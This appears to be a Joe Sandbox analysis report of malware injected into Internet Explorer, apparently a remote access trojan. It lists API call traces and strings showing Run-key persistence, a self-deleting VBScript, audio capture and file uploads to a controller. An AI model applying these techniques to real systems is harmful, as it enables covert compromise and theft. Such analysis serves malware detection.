              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
              • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
              • ExitProcess.KERNEL32 ref: 0040D7D0
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
              • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
              • API String ID: 1861856835-332907002
              • Opcode ID: aab9d67af7bba34589bd1e08c972ddc1967b05aaf0854c29f14300e4276d6a0c
              • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
              • Opcode Fuzzy Hash: aab9d67af7bba34589bd1e08c972ddc1967b05aaf0854c29f14300e4276d6a0c
              • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
              APIs
                • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
              • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
              • ExitProcess.KERNEL32 ref: 0040D419
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
              • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
              • API String ID: 3797177996-2557013105
              • Opcode ID: b36824b11f10f3b444a8b97f0e67253d4dc48ec9fee95e9f7c4bd89e62d8a7f2
              • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
              • Opcode Fuzzy Hash: b36824b11f10f3b444a8b97f0e67253d4dc48ec9fee95e9f7c4bd89e62d8a7f2
              • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
              APIs
              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
              • ExitProcess.KERNEL32(00000000), ref: 004124A0
              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
              • CloseHandle.KERNEL32(00000000), ref: 0041253B
              • GetCurrentProcessId.KERNEL32 ref: 00412541
              • PathFileExistsW.SHLWAPI(?), ref: 00412572
              • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
              • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
              • Sleep.KERNEL32(000001F4), ref: 00412682
              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
              • CloseHandle.KERNEL32(00000000), ref: 004126A9
              • GetCurrentProcessId.KERNEL32 ref: 004126AF
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
              • String ID: .exe$8SG$WDH$exepath$open$temp_
              • API String ID: 2649220323-436679193
              • Opcode ID: 27ebd3acb66490a658fb84cbcb4be0e8882fac680c12dd1f3eb83daadc95584a
              • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
              • Opcode Fuzzy Hash: 27ebd3acb66490a658fb84cbcb4be0e8882fac680c12dd1f3eb83daadc95584a
              • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
              APIs
              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
              • SetEvent.KERNEL32 ref: 0041B219
              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
              • CloseHandle.KERNEL32 ref: 0041B23A
              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
              • API String ID: 738084811-2094122233
              • Opcode ID: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
              • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
              • Opcode Fuzzy Hash: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
              • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
              APIs
              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
              • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
              • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
              • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: File$Write$Create
              • String ID: RIFF$WAVE$data$fmt
              • API String ID: 1602526932-4212202414
              • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
              • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
              • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
              • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
              APIs
              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Program Files (x86)\Internet Explorer\iexplore.exe,00000001,0040764D,C:\Program Files (x86)\Internet Explorer\iexplore.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
              • GetProcAddress.KERNEL32(00000000), ref: 0040728D
              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
              • GetProcAddress.KERNEL32(00000000), ref: 004072A5
              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
              • GetProcAddress.KERNEL32(00000000), ref: 004072B9
              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
              • GetProcAddress.KERNEL32(00000000), ref: 004072CD
              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
              • GetProcAddress.KERNEL32(00000000), ref: 004072E1
              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
              • GetProcAddress.KERNEL32(00000000), ref: 004072F5
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: AddressHandleModuleProc
              • String ID: C:\Program Files (x86)\Internet Explorer\iexplore.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
              • API String ID: 1646373207-2422700265
              • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
              • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
              • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
              • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _free$Info
              • String ID: @"a/
              • API String ID: 2509303402-2936340451
              • Opcode ID: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
              • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
              • Opcode Fuzzy Hash: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
              • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
              APIs
              • _wcslen.LIBCMT ref: 0040CE07
              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
              • CopyFileW.KERNEL32(C:\Program Files (x86)\Internet Explorer\iexplore.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
              • _wcslen.LIBCMT ref: 0040CEE6
              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
              • CopyFileW.KERNEL32(C:\Program Files (x86)\Internet Explorer\iexplore.exe,00000000,00000000), ref: 0040CF84
              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
              • _wcslen.LIBCMT ref: 0040CFC6
              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
              • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
              • ExitProcess.KERNEL32 ref: 0040D062
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
              • String ID: 6$C:\Program Files (x86)\Internet Explorer\iexplore.exe$del$open
              • API String ID: 1579085052-3424723665
              • Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
              • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
              • Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
              • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
              APIs
              • lstrlenW.KERNEL32(?), ref: 0041C036
              • _memcmp.LIBVCRUNTIME ref: 0041C04E
              • lstrlenW.KERNEL32(?), ref: 0041C067
              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
              • lstrcmpW.KERNEL32(?,?), ref: 0041C114
              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
              • _wcslen.LIBCMT ref: 0041C13B
              • FindVolumeClose.KERNEL32(?), ref: 0041C15B
              • GetLastError.KERNEL32 ref: 0041C173
              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
              • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
              • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
              • GetLastError.KERNEL32 ref: 0041C1D0
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
              • String ID: ?
              • API String ID: 3941738427-1684325040
              • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
              • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
              • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
              • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
              APIs
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _free$EnvironmentVariable$_wcschr
              • String ID:
              • API String ID: 3899193279-0
              • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
              • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
              • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
              • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
              APIs
              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
              • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
              • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
              • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
              • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
              • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
              • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
              • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
              • Sleep.KERNEL32(00000064), ref: 00412E94
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
              • String ID: /stext "$0TG$0TG$NG$NG
              • API String ID: 1223786279-2576077980
              • Opcode ID: 8e338586697e4724e08d117bd8d3faf493e970ab47327ace452d08935691f8ff
              • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
              • Opcode Fuzzy Hash: 8e338586697e4724e08d117bd8d3faf493e970ab47327ace452d08935691f8ff
              • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
              APIs
              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
              • LoadLibraryA.KERNEL32(?), ref: 00414E17
              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
              • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
              • LoadLibraryA.KERNEL32(?), ref: 00414E76
              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
              • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
              • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
              • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Library$AddressFreeProc$Load$DirectorySystem
              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
              • API String ID: 2490988753-744132762
              • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
              • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
              • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
              • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
              APIs
              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
              • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseEnumOpen
              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
              • API String ID: 1332880857-3714951968
              • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
              • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
              • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
              • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
              APIs
              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
              • GetCursorPos.USER32(?), ref: 0041D5E9
              • SetForegroundWindow.USER32(?), ref: 0041D5F2
              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
              • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
              • ExitProcess.KERNEL32 ref: 0041D665
              • CreatePopupMenu.USER32 ref: 0041D66B
              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
              • String ID: Close
              • API String ID: 1657328048-3535843008
              • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
              • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
              • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
              • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
              APIs
              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
              • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
              • __aulldiv.LIBCMT ref: 00408D4D
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
              • CloseHandle.KERNEL32(00000000), ref: 00408F64
              • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
              • CloseHandle.KERNEL32(00000000), ref: 00408FFC
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
              • API String ID: 3086580692-2582957567
              • Opcode ID: 519df95e19e5183c43d2c3bfa7cb97a771bba058fe4d38d3fcc7a0475774db6c
              • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
              • Opcode Fuzzy Hash: 519df95e19e5183c43d2c3bfa7cb97a771bba058fe4d38d3fcc7a0475774db6c
              • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
              APIs
              • Sleep.KERNEL32(00001388), ref: 0040A740
                • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
              • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
              • String ID: 8SG$8SG$pQG$pQG$PG$PG
              • API String ID: 3795512280-1152054767
              • Opcode ID: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
              • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
              • Opcode Fuzzy Hash: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
              • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
              APIs
              • ___free_lconv_mon.LIBCMT ref: 0045130A
                • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
